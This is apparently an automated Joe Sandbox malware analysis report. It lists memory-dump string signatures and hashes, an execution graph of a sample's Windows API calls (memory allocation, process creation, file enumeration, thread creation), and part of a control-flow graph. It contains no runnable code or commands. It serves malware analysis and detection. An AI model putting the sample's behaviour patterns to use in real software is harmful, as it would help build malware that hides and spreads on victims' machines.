                                                                                                        • Instruction Fuzzy Hash: 9B4165B9D00318AADF15EBA1CC40FEE737DAF55300F40859EA509AF140EBB597588FA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L$S$\$a$c$e$l
                                                                                                        • API String ID: 0-3322591375
                                                                                                        • Opcode ID: 256b9de28f82d96f7ac354dd3f50f40930f0f3917f45e39920189dc31cc7af00
                                                                                                        • Instruction ID: 822306ffcc0e84b363b29bdf8cf85413acb3bd760f0f10ec3c180089d24c2709
                                                                                                        • Opcode Fuzzy Hash: 256b9de28f82d96f7ac354dd3f50f40930f0f3917f45e39920189dc31cc7af00
                                                                                                        • Instruction Fuzzy Hash: B74193B6C50718AEDF50DFA5DC84AEFB7B8AF49300F04426ED809AB200E7715A558B94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                        • API String ID: 0-2523166886
                                                                                                        • Opcode ID: 2a8a516c4e9cee1fa9bae04ca954bce0cdf3d2c3b927ff8f231fa489eef1456c
                                                                                                        • Instruction ID: b1f02c27ff77e3473ab66648fe942042d267b3f042d680f25fa3567f4c48cb0d
                                                                                                        • Opcode Fuzzy Hash: 2a8a516c4e9cee1fa9bae04ca954bce0cdf3d2c3b927ff8f231fa489eef1456c
                                                                                                        • Instruction Fuzzy Hash: E551E4B1A00704AFEB34DBA5CC84BEBF3B8EF05700F04466EA5495E280D7B4A944CB99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1$7$<$]$`$|
                                                                                                        • API String ID: 0-253291433
                                                                                                        • Opcode ID: 7eb6586e78310f4514fb118cf3b4021dab7694923bddf10af4403f5bb45f3b0b
                                                                                                        • Instruction ID: 8dd1cf96131e59c3ef1a18676219c68ac8b4d60ac42ec676a111f9ed07cc5b17
                                                                                                        • Opcode Fuzzy Hash: 7eb6586e78310f4514fb118cf3b4021dab7694923bddf10af4403f5bb45f3b0b
                                                                                                        • Instruction Fuzzy Hash: 5F11CC10D087CADDDB12CABC84447AEBF755F23224F4883D9D5E12B2D2C2754346C7A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $i$l$o$u
                                                                                                        • API String ID: 0-2051669658
                                                                                                        • Opcode ID: 799ef448128c91bcc9c0802de023f5ec7820dc79819f5f80c49c9b154976784a
                                                                                                        • Instruction ID: b91d60d36e87cd2a71decafdc87f9ee9a2d4ce7effbff087564ed1216adf0865
                                                                                                        • Opcode Fuzzy Hash: 799ef448128c91bcc9c0802de023f5ec7820dc79819f5f80c49c9b154976784a
                                                                                                        • Instruction Fuzzy Hash: A9612EB5A00304AFDB24DBE4CC84FEFB7BCAB48700F14466DE559AB280D775AA45CB64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $i$l$o$u
                                                                                                        • API String ID: 0-2051669658
                                                                                                        • Opcode ID: 447455a7285557a0da8be02e502fb63d0fba3d1eb437b3bb5fcd16db05afe006
                                                                                                        • Instruction ID: 2ea53b98d3ebcb909ac7853a71addd2f45cdbefab1278569e1bec61225eb2666
                                                                                                        • Opcode Fuzzy Hash: 447455a7285557a0da8be02e502fb63d0fba3d1eb437b3bb5fcd16db05afe006
                                                                                                        • Instruction Fuzzy Hash: 57411CB5A00308AFDB60DFA5CC84FEFBBB9AB48704F10455DE519AB280D770AA45CB64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$k$o
                                                                                                        • API String ID: 0-3624523832
                                                                                                        • Opcode ID: 4de61bfc5bfcae6d749dac368cda1bf1f49063927731c41ce0b4816da5290e7a
                                                                                                        • Instruction ID: b7da3981c7ddd3fee0a79a56f1b392c355d641bd1480894e0645f635f95039a5
                                                                                                        • Opcode Fuzzy Hash: 4de61bfc5bfcae6d749dac368cda1bf1f49063927731c41ce0b4816da5290e7a
                                                                                                        • Instruction Fuzzy Hash: 69B11DB5A00304AFDB14DBA4CC84FEFB7B9AF88704F148559F6199B280D675AE41CB54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$k$o
                                                                                                        • API String ID: 0-3624523832
                                                                                                        • Opcode ID: ebf3b0c5988957a74cccbace6a2e57a31f725b90969e2aedbde9fd2f9cc6787a
                                                                                                        • Instruction ID: ec5727bf606527c70be783cacc8184c51d57672867ce1d647e80c5098ac99a2a
                                                                                                        • Opcode Fuzzy Hash: ebf3b0c5988957a74cccbace6a2e57a31f725b90969e2aedbde9fd2f9cc6787a
                                                                                                        • Instruction Fuzzy Hash: 76611CB5A00308AFDB54DFA5CC84FEFB7BDAF88704F108559E6199B284DB70AA41CB54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                        • API String ID: 0-2877786613
                                                                                                        • Opcode ID: b7f2bc92af16d19d73bc55fe0acc5cf4641c2c5a48f470c14e0fca4ee3d1e083
                                                                                                        • Instruction ID: 9420adc4f7f7a864ab653a1d085f1aaedf20484e517d0e0df25c77ee881032f7
                                                                                                        • Opcode Fuzzy Hash: b7f2bc92af16d19d73bc55fe0acc5cf4641c2c5a48f470c14e0fca4ee3d1e083
                                                                                                        • Instruction Fuzzy Hash: 204151B59116587EEB05EBD2CC41FFFBB3CAF4A600F00444AF604AE184E7746A15C7AA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                        • API String ID: 0-2877786613
                                                                                                        • Opcode ID: 5c818c6f37cae22d35c19d194bc4627f3942702dd50ec5e470d7f71f45e99574
                                                                                                        • Instruction ID: c2c8ec85f3f7e31afb1a3b59adbde83a0e2116f661d889d04c2725e63a588040
                                                                                                        • Opcode Fuzzy Hash: 5c818c6f37cae22d35c19d194bc4627f3942702dd50ec5e470d7f71f45e99574
                                                                                                        • Instruction Fuzzy Hash: 97315FB59117587EEB05EB92CC41FFFBB7C9F4A600F00444AFA046E284E7746A11C7AA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1$1$4$V
                                                                                                        • API String ID: 0-3973498828
                                                                                                        • Opcode ID: 4b52713c8517702e18b052b81a2e0594fbb65c864459b1938a90cf1b1a0f5b0b
                                                                                                        • Instruction ID: 3a821f3a51e562625016048fc3f742088626cadcc771c22b5981370b23ed7af7
                                                                                                        • Opcode Fuzzy Hash: 4b52713c8517702e18b052b81a2e0594fbb65c864459b1938a90cf1b1a0f5b0b
                                                                                                        • Instruction Fuzzy Hash: C33124B5E10219ABEB00DB94CD41FFF77B9EF04304F044159E904AF240E675AA558BE9

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.1%
                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                        Signature Coverage:2.3%
                                                                                                        Total number of Nodes:438
                                                                                                        Total number of Limit Nodes:70
                                                                                                        execution_graph 81208 2ea9a2b 81210 2ea9a31 81208->81210 81209 2ea9a5d 81210->81209 81212 2ebb2c0 81210->81212 81215 2eb9540 81212->81215 81214 2ebb2d9 81214->81209 81216 2eb955d 81215->81216 81217 2eb956e RtlFreeHeap 81216->81217 81217->81214 81218 2e99ba0 81219 2e99e84 81218->81219 81221 2e9a216 81219->81221 81222 2ebaf20 81219->81222 81223 2ebaf46 81222->81223 81228 2e94140 81223->81228 81225 2ebaf52 81226 2ebaf8b 81225->81226 81231 2eb5440 81225->81231 81226->81221 81235 2ea2fc0 81228->81235 81230 2e9414d 81230->81225 81232 2eb54a1 81231->81232 81234 2eb54ae 81232->81234 81253 2ea1770 81232->81253 81234->81226 81236 2ea2fdd 81235->81236 81238 2ea2ff6 81236->81238 81239 2eb9c40 81236->81239 81238->81230 81240 2eb9c5a 81239->81240 81241 2eb9c89 81240->81241 81246 2eb8800 81240->81246 81241->81238 81244 2ebb2c0 RtlFreeHeap 81245 2eb9d02 81244->81245 81245->81238 81247 2eb881a 81246->81247 81250 4fa2c0a 81247->81250 81248 2eb8846 81248->81244 81251 4fa2c1f LdrInitializeThunk 81250->81251 81252 4fa2c11 81250->81252 81251->81248 81252->81248 81254 2ea17ab 81253->81254 81269 2ea7c80 81254->81269 81256 2ea17b3 81257 2ea1a8d 81256->81257 81280 2ebb3a0 81256->81280 81257->81234 81259 2ea17c9 81260 2ebb3a0 RtlAllocateHeap 81259->81260 81261 2ea17da 81260->81261 81262 2ebb3a0 RtlAllocateHeap 81261->81262 81263 2ea17eb 81262->81263 81268 2ea188b 81263->81268 81294 2ea67d0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81263->81294 81266 2ea1a42 81290 2eb7d80 81266->81290 81283 2ea4300 81268->81283 81270 2ea7cac 81269->81270 81295 2ea7b70 81270->81295 81273 2ea7cd9 81275 2ea7ce4 81273->81275 81301 2eb91d0 81273->81301 81274 2ea7cf1 81276 2ea7d0d 81274->81276 81278 2eb91d0 NtClose 81274->81278 81275->81256 81276->81256 81279 2ea7d03 81278->81279 81279->81256 81309 2eb94f0 81280->81309 81282 2ebb3bb 81282->81259 81285 2ea4324 81283->81285 81284 2ea432b 81284->81266 81285->81284 81286 2ea434a 81285->81286 81312 2ebc860 LdrLoadDll 81285->81312 81288 2ea4360 LdrLoadDll 81286->81288 81289 2ea4377 81286->81289 81288->81289 81289->81266 81291 2eb7de2 81290->81291 81293 2eb7def 81291->81293 81313 2ea1aa0 81291->81313 81293->81257 81294->81268 81296 2ea7b8a 81295->81296 81300 2ea7c66 81295->81300 81304 2eb88a0 81296->81304 81299 2eb91d0 NtClose 81299->81300 81300->81273 81300->81274 81302 2eb91ed 81301->81302 81303 2eb91fe NtClose 81302->81303 81303->81275 81305 2eb88bd 81304->81305 81308 4fa35c0 LdrInitializeThunk 81305->81308 81306 2ea7c5a 81306->81299 81308->81306 81310 2eb950d 81309->81310 81311 2eb951e RtlAllocateHeap 81310->81311 81311->81282 81312->81286 81329 2ea7f50 81313->81329 81315 2ea1ac0 81322 2ea2023 81315->81322 81333 2eb0f50 81315->81333 81318 2ea1cd7 81341 2ebc5b0 81318->81341 81319 2ea1b1e 81319->81322 81336 2ebc480 81319->81336 81322->81293 81323 2ea1cec 81325 2ea1d3c 81323->81325 81347 2ea05c0 81323->81347 81325->81322 81326 2ea05c0 LdrInitializeThunk 81325->81326 81351 2ea7ef0 81325->81351 81326->81325 81327 2ea1e90 81327->81325 81328 2ea7ef0 LdrInitializeThunk 81327->81328 81328->81327 81330 2ea7f5d 81329->81330 81331 2ea7f7e SetErrorMode 81330->81331 81332 2ea7f85 81330->81332 81331->81332 81332->81315 81355 2ebb230 81333->81355 81335 2eb0f71 81335->81319 81337 2ebc490 81336->81337 81338 2ebc496 81336->81338 81337->81318 81339 2ebb3a0 RtlAllocateHeap 81338->81339 81340 2ebc4bc 81339->81340 81340->81318 81342 2ebc520 81341->81342 81343 2ebb3a0 RtlAllocateHeap 81342->81343 81344 2ebc57d 81342->81344 81345 2ebc55a 81343->81345 81344->81323 81346 2ebb2c0 RtlFreeHeap 81345->81346 81346->81344 81348 2ea05cc 81347->81348 81362 2eb9460 81348->81362 81352 2ea7f03 81351->81352 81367 2eb8700 81352->81367 81354 2ea7f2e 81354->81325 81358 2eb9340 81355->81358 81357 2ebb261 81357->81335 81359 2eb936b 81358->81359 81360 2eb93d5 81358->81360 81359->81357 81361 2eb93eb NtAllocateVirtualMemory 81360->81361 81361->81357 81363 2eb947a 81362->81363 81366 4fa2c70 LdrInitializeThunk 81363->81366 81364 2ea05e2 81364->81327 81366->81364 81368 2eb8781 81367->81368 81369 2eb872e 81367->81369 81372 4fa2dd0 LdrInitializeThunk 81368->81372 81369->81354 81370 2eb87a6 81370->81354 81372->81370 81374 2ea6f20 81375 2ea6f3c 81374->81375 81379 2ea6f8f 81374->81379 81377 2eb91d0 NtClose 81375->81377 81375->81379 81376 2ea70c7 81378 2ea6f57 81377->81378 81384 2ea6300 NtClose LdrInitializeThunk LdrInitializeThunk 81378->81384 81379->81376 81385 2ea6300 NtClose LdrInitializeThunk LdrInitializeThunk 81379->81385 81381 2ea70a1 81381->81376 81386 2ea64d0 NtClose LdrInitializeThunk LdrInitializeThunk 81381->81386 81384->81379 81385->81381 81386->81376 81387 2ebc4e0 81388 2ebb2c0 RtlFreeHeap 81387->81388 81389 2ebc4f5 81388->81389 81390 2ea2ebc 81391 2ea7b70 2 API calls 81390->81391 81392 2ea2ecc 81391->81392 81393 2ea2ee8 81392->81393 81394 2eb91d0 NtClose 81392->81394 81394->81393 81395 2e9b2b0 81396 2ebb230 NtAllocateVirtualMemory 81395->81396 81397 2e9c921 81396->81397 81398 2eac3f0 81400 2eac419 81398->81400 81399 2eac51d 81400->81399 81401 2eac4c3 FindFirstFileW 81400->81401 81401->81399 81402 2eac4de 81401->81402 81403 2eac504 FindNextFileW 81402->81403 81403->81402 81404 2eac516 FindClose 81403->81404 81404->81399 81406 2ea5970 81407 2ea7ef0 LdrInitializeThunk 81406->81407 81408 2ea59a0 81407->81408 81410 2ea59cc 81408->81410 81411 2ea7e70 81408->81411 81412 2ea7eb4 81411->81412 81413 2ea7ed5 81412->81413 81418 2eb84d0 81412->81418 81413->81408 81415 2ea7ec5 81416 2ea7ee1 81415->81416 81417 2eb91d0 NtClose 81415->81417 81416->81408 81417->81413 81419 2eb84fe 81418->81419 81420 2eb8550 81418->81420 81419->81415 81423 4fa4650 LdrInitializeThunk 81420->81423 81421 2eb8575 81421->81415 81423->81421 81425 2eb8630 81426 2eb86bf 81425->81426 81428 2eb865b 81425->81428 81430 4fa2ee0 LdrInitializeThunk 81426->81430 81427 2eb86f0 81430->81427 81431 2eb5eb0 81432 2eb5f0a 81431->81432 81434 2eb5f17 81432->81434 81435 2eb38c0 81432->81435 81436 2ebb230 NtAllocateVirtualMemory 81435->81436 81438 2eb3901 81436->81438 81437 2eb39fe 81437->81434 81438->81437 81439 2ea4300 2 API calls 81438->81439 81441 2eb393e 81439->81441 81440 2eb3980 Sleep 81440->81441 81441->81437 81441->81440 81442 2eb9030 81443 2eb90da 81442->81443 81445 2eb905e 81442->81445 81444 2eb90f0 NtReadFile 81443->81444 81446 2eb87b0 81447 2eb87cd 81446->81447 81450 4fa2df0 LdrInitializeThunk 81447->81450 81448 2eb87f5 81450->81448 81451 2ea71b1 81452 2ea714c 81451->81452 81454 2ea7172 81452->81454 81455 2eab080 81452->81455 81456 2eab0a6 81455->81456 81457 2eab2d9 81456->81457 81482 2eb95d0 81456->81482 81457->81454 81459 2eab11c 81459->81457 81460 2ebc5b0 2 API calls 81459->81460 81461 2eab13b 81460->81461 81461->81457 81462 2eab212 81461->81462 81463 2eb8800 LdrInitializeThunk 81461->81463 81464 2ea58f0 LdrInitializeThunk 81462->81464 81466 2eab231 81462->81466 81465 2eab19d 81463->81465 81464->81466 81465->81462 81470 2eab1a6 81465->81470 81481 2eab2c1 81466->81481 81488 2eb8370 81466->81488 81467 2eab1fa 81468 2ea7ef0 LdrInitializeThunk 81467->81468 81473 2eab208 81468->81473 81469 2eab1d8 81503 2eb45c0 LdrInitializeThunk 81469->81503 81470->81457 81470->81467 81470->81469 81485 2ea58f0 81470->81485 81473->81454 81474 2ea7ef0 LdrInitializeThunk 81477 2eab2cf 81474->81477 81476 2eab298 81493 2eb8420 81476->81493 81477->81454 81479 2eab2b2 81498 2eb8580 81479->81498 81481->81474 81483 2eb95ea 81482->81483 81484 2eb95fb CreateProcessInternalW 81483->81484 81484->81459 81487 2ea592e 81485->81487 81504 2eb89d0 81485->81504 81487->81469 81489 2eb839b 81488->81489 81490 2eb83ed 81488->81490 81489->81476 81510 4fa39b0 LdrInitializeThunk 81490->81510 81491 2eb8412 81491->81476 81494 2eb849d 81493->81494 81495 2eb844b 81493->81495 81511 4fa4340 LdrInitializeThunk 81494->81511 81495->81479 81496 2eb84c2 81496->81479 81499 2eb85fd 81498->81499 81501 2eb85ab 81498->81501 81512 4fa2fb0 LdrInitializeThunk 81499->81512 81500 2eb8622 81500->81481 81501->81481 81503->81467 81505 2eb8a81 81504->81505 81507 2eb89ff 81504->81507 81509 4fa2d10 LdrInitializeThunk 81505->81509 81506 2eb8ac6 81506->81487 81507->81487 81509->81506 81510->81491 81511->81496 81512->81500 81513 2eb9130 81514 2eb91a7 81513->81514 81516 2eb915b 81513->81516 81515 2eb91bd NtDeleteFile 81514->81515 81517 2e99b40 81519 2e99b4f 81517->81519 81518 2e99b90 81519->81518 81520 2e99b7d CreateThread 81519->81520 81521 4fa2ad0 LdrInitializeThunk 81522 2eaf640 81523 2eaf6a4 81522->81523 81553 2ea6070 81523->81553 81525 2eaf7de 81526 2eaf7d7 81526->81525 81560 2ea6180 81526->81560 81530 2eaf87e 81531 2eaf992 81530->81531 81569 2eaf420 81530->81569 81532 2eb91d0 NtClose 81531->81532 81534 2eaf99c 81532->81534 81535 2eaf896 81535->81531 81536 2eaf8a1 81535->81536 81537 2ebb3a0 RtlAllocateHeap 81536->81537 81538 2eaf8ca 81537->81538 81539 2eaf8e9 81538->81539 81540 2eaf8d3 81538->81540 81578 2eaf310 CoInitialize 81539->81578 81541 2eb91d0 NtClose 81540->81541 81543 2eaf8dd 81541->81543 81544 2eaf8f7 81581 2eb8c80 81544->81581 81546 2eaf972 81547 2eb91d0 NtClose 81546->81547 81548 2eaf97c 81547->81548 81549 2ebb2c0 RtlFreeHeap 81548->81549 81550 2eaf983 81549->81550 81551 2eaf915 81551->81546 81552 2eb8c80 LdrInitializeThunk 81551->81552 81552->81551 81554 2ea60a3 81553->81554 81555 2ea60c7 81554->81555 81585 2eb8d30 81554->81585 81555->81526 81557 2ea60ea 81557->81555 81558 2eb91d0 NtClose 81557->81558 81559 2ea616a 81558->81559 81559->81526 81561 2ea61a5 81560->81561 81590 2eb8b10 81561->81590 81564 2eb6ce0 81565 2eb6d45 81564->81565 81566 2eb6d78 81565->81566 81595 2eb0254 RtlFreeHeap 81565->81595 81566->81530 81568 2eb6d5a 81568->81530 81570 2eaf43c 81569->81570 81571 2ea4300 2 API calls 81570->81571 81573 2eaf45a 81571->81573 81572 2eaf463 81572->81535 81573->81572 81574 2ea4300 2 API calls 81573->81574 81575 2eaf52e 81574->81575 81576 2ea4300 2 API calls 81575->81576 81577 2eaf588 81575->81577 81576->81577 81577->81535 81580 2eaf375 81578->81580 81579 2eaf40b CoUninitialize 81579->81544 81580->81579 81582 2eb8c9d 81581->81582 81596 4fa2ba0 LdrInitializeThunk 81582->81596 81583 2eb8ccd 81583->81551 81586 2eb8d4a 81585->81586 81589 4fa2ca0 LdrInitializeThunk 81586->81589 81587 2eb8d76 81587->81557 81589->81587 81591 2eb8b2a 81590->81591 81594 4fa2c60 LdrInitializeThunk 81591->81594 81592 2ea6219 81592->81550 81592->81564 81594->81592 81595->81568 81596->81583 81597 2ea2040 81598 2eb8800 LdrInitializeThunk 81597->81598 81599 2ea2076 81598->81599 81602 2eb9270 81599->81602 81601 2ea208b 81603 2eb9302 81602->81603 81605 2eb929e 81602->81605 81607 4fa2e80 LdrInitializeThunk 81603->81607 81604 2eb9333 81604->81601 81605->81601 81607->81604 81608 2ea6b40 81609 2ea6b6a 81608->81609 81612 2ea7d20 81609->81612 81611 2ea6b94 81613 2ea7d3d 81612->81613 81619 2eb88f0 81613->81619 81615 2ea7d8d 81616 2ea7d94 81615->81616 81617 2eb89d0 LdrInitializeThunk 81615->81617 81616->81611 81618 2ea7dbd 81617->81618 81618->81611 81620 2eb898e 81619->81620 81622 2eb891e 81619->81622 81624 4fa2f30 LdrInitializeThunk 81620->81624 81621 2eb89c7 81621->81615 81622->81615 81624->81621 81625 2eaff40 81626 2eaff63 81625->81626 81627 2ea4300 2 API calls 81626->81627 81628 2eaff87 81627->81628 81629 2eb6ce0 RtlFreeHeap 81628->81629 81630 2eb0111 81628->81630 81629->81630 81631 2eb8ec0 81632 2eb8f77 81631->81632 81634 2eb8eef 81631->81634 81633 2eb8f8d NtCreateFile 81632->81633 81635 2eb1580 81636 2eb159c 81635->81636 81637 2eb15d8 81636->81637 81638 2eb15c4 81636->81638 81640 2eb91d0 NtClose 81637->81640 81639 2eb91d0 NtClose 81638->81639 81641 2eb15cd 81639->81641 81642 2eb15e1 81640->81642 81645 2ebb3e0 RtlAllocateHeap 81642->81645 81644 2eb15ec 81645->81644 81646 2ea0b9b PostThreadMessageW 81647 2ea0bad 81646->81647 81648 2ea2518 81649 2ea6070 2 API calls 81648->81649 81650 2ea2543 81649->81650 81651 2eaab50 81656 2eaa860 81651->81656 81653 2eaab5d 81670 2eaa4d0 81653->81670 81655 2eaab79 81657 2eaa885 81656->81657 81681 2ea8160 81657->81681 81660 2eaa9d3 81660->81653 81662 2eaa9ea 81662->81653 81663 2eaa9e1 81663->81662 81665 2eaaad7 81663->81665 81700 2ea9f20 81663->81700 81667 2eaab3a 81665->81667 81709 2eaa290 81665->81709 81668 2ebb2c0 RtlFreeHeap 81667->81668 81669 2eaab41 81668->81669 81669->81653 81671 2eaa4e6 81670->81671 81678 2eaa4f1 81670->81678 81672 2ebb3a0 RtlAllocateHeap 81671->81672 81672->81678 81673 2eaa512 81673->81655 81674 2ea8160 GetFileAttributesW 81674->81678 81675 2eaa835 81676 2eaa84e 81675->81676 81677 2ebb2c0 RtlFreeHeap 81675->81677 81676->81655 81677->81676 81678->81673 81678->81674 81678->81675 81679 2ea9f20 RtlFreeHeap 81678->81679 81680 2eaa290 RtlFreeHeap 81678->81680 81679->81678 81680->81678 81682 2ea8181 81681->81682 81683 2ea8188 GetFileAttributesW 81682->81683 81684 2ea8193 81682->81684 81683->81684 81684->81660 81685 2eb31a0 81684->81685 81686 2eb31ae 81685->81686 81687 2eb31b5 81685->81687 81686->81663 81688 2ea4300 2 API calls 81687->81688 81689 2eb31ea 81688->81689 81690 2eb31f9 81689->81690 81713 2eb2c60 LdrLoadDll LdrLoadDll 81689->81713 81692 2ebb3a0 RtlAllocateHeap 81690->81692 81696 2eb33a4 81690->81696 81693 2eb3212 81692->81693 81694 2eb339a 81693->81694 81693->81696 81698 2eb322e 81693->81698 81695 2ebb2c0 RtlFreeHeap 81694->81695 81694->81696 81695->81696 81696->81663 81697 2ebb2c0 RtlFreeHeap 81699 2eb338e 81697->81699 81698->81696 81698->81697 81699->81663 81701 2ea9f46 81700->81701 81714 2ead960 81701->81714 81703 2ea9fbb 81705 2eaa140 81703->81705 81707 2ea9fd9 81703->81707 81704 2eaa125 81704->81663 81705->81704 81706 2ea9de0 RtlFreeHeap 81705->81706 81706->81705 81707->81704 81719 2ea9de0 81707->81719 81710 2eaa2b6 81709->81710 81711 2ead960 RtlFreeHeap 81710->81711 81712 2eaa33d 81711->81712 81712->81665 81713->81690 81716 2ead984 81714->81716 81715 2ead991 81715->81703 81716->81715 81717 2ebb2c0 RtlFreeHeap 81716->81717 81718 2ead9d4 81717->81718 81718->81703 81720 2ea9dfd 81719->81720 81723 2ead9f0 81720->81723 81722 2ea9f03 81722->81707 81724 2eada14 81723->81724 81725 2eadabe 81724->81725 81726 2ebb2c0 RtlFreeHeap 81724->81726 81725->81722 81726->81725 81742 2eb1910 81743 2eb1929 81742->81743 81744 2eb1974 81743->81744 81747 2eb19b0 81743->81747 81749 2eb19b5 81743->81749 81745 2ebb2c0 RtlFreeHeap 81744->81745 81746 2eb1980 81745->81746 81748 2ebb2c0 RtlFreeHeap 81747->81748 81748->81749 81750 2ea8617 81751 2ea861a 81750->81751 81752 2ea85d1 81751->81752 81754 2ea6d60 LdrInitializeThunk LdrInitializeThunk 81751->81754 81754->81752

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 29 2e99ba0-2e99e82 30 2e99e93-2e99e9c 29->30 31 2e99e9e-2e99eb0 30->31 32 2e99eb2-2e99ebb 30->32 31->30 34 2e99ebd-2e99ed5 32->34 35 2e99ed7-2e99ef0 32->35 34->32 35->35 36 2e99ef2-2e99f0a 35->36 37 2e99f1b-2e99f25 36->37 38 2e99f3c-2e99f46 37->38 39 2e99f27-2e99f3a 37->39 41 2e99f57-2e99f63 38->41 39->37 42 2e99f71-2e99f82 41->42 43 2e99f65-2e99f6f 41->43 45 2e99f93-2e99f9f 42->45 43->41 46 2e99fa1-2e99fb4 45->46 47 2e99fb6-2e99fc0 45->47 46->45 49 2e99fd1-2e99fdd 47->49 50 2e99fed-2e99ff1 49->50 51 2e99fdf-2e99feb 49->51 53 2e9a01a-2e9a023 50->53 54 2e99ff3-2e9a018 50->54 51->49 55 2e9a029-2e9a030 53->55 56 2e9a162-2e9a16c 53->56 54->50 57 2e9a069-2e9a07c 55->57 58 2e9a032-2e9a042 55->58 59 2e9a16e-2e9a18d 56->59 60 2e9a1a0-2e9a1a4 56->60 63 2e9a08d-2e9a099 57->63 61 2e9a053-2e9a067 58->61 62 2e9a044-2e9a04d 58->62 64 2e9a18f-2e9a198 59->64 65 2e9a19e 59->65 66 2e9a1cc-2e9a1d3 60->66 67 2e9a1a6-2e9a1ca 60->67 61->55 62->61 70 2e9a09b-2e9a0a4 63->70 71 2e9a0b1-2e9a0c0 63->71 64->65 65->56 68 2e9a1d9-2e9a1e3 66->68 69 2e9a2c0-2e9a2d9 66->69 67->60 72 2e9a1f4-2e9a200 68->72 69->69 73 2e9a2db-2e9a2e2 69->73 74 2e9a0af 70->74 75 2e9a0a6-2e9a0a9 70->75 76 2e9a0c2-2e9a0c6 71->76 77 2e9a0f6-2e9a100 71->77 81 2e9a211 call 2ebaf20 72->81 82 2e9a202-2e9a20f 72->82 83 2e9a303-2e9a30d 73->83 84 2e9a2e4-2e9a301 73->84 74->63 75->74 78 2e9a0c8-2e9a0f2 76->78 79 2e9a0f4 76->79 80 2e9a111-2e9a11b 77->80 78->76 79->56 86 2e9a12b-2e9a131 80->86 87 2e9a11d-2e9a129 80->87 92 2e9a216-2e9a220 81->92 88 2e9a1e5-2e9a1ee 82->88 84->73 91 2e9a135-2e9a13c 86->91 87->80 88->72 93 2e9a15d 91->93 94 2e9a13e-2e9a15b 91->94 95 2e9a231-2e9a23a 92->95 93->53 94->91 96 2e9a23c-2e9a24e 95->96 97 2e9a250-2e9a25a 95->97 